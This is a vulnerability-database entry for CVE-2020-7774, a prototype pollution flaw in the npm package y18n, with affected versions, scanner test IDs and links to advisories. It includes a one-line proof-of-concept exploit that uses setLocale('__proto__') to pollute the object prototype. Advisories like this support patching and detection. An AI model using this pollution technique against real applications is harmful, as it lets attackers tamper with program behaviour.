Vulnerability   
Search   
    Search 219043 CVE descriptions
and 99761 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

CVE ID:CVE-2020-7774
Description:This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
Test IDs: 1.3.6.1.4.1.25623.1.1.4.2021.2354.1   1.3.6.1.4.1.25623.1.1.4.2021.2620.1   1.3.6.1.4.1.25623.1.1.4.2021.2618.1   1.3.6.1.4.1.25623.1.0.853988   1.3.6.1.4.1.25623.1.0.854054   1.3.6.1.4.1.25623.1.0.854042   1.3.6.1.4.1.25623.1.0.853994   1.3.6.1.4.1.25623.1.1.4.2021.2319.1  
Cross References: Common Vulnerability Exposure (CVE) ID: CVE-2020-7774
https://github.com/yargs/y18n/issues/96
https://github.com/yargs/y18n/issues/96
https://github.com/yargs/y18n/pull/108
https://github.com/yargs/y18n/pull/108
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
https://snyk.io/vuln/SNYK-JS-Y18N-1021887
https://snyk.io/vuln/SNYK-JS-Y18N-1021887
https://www.oracle.com/security-alerts/cpuApr2021.html
https://www.oracle.com/security-alerts/cpuApr2021.html




© 1998-2024 E-Soft Inc. All rights reserved.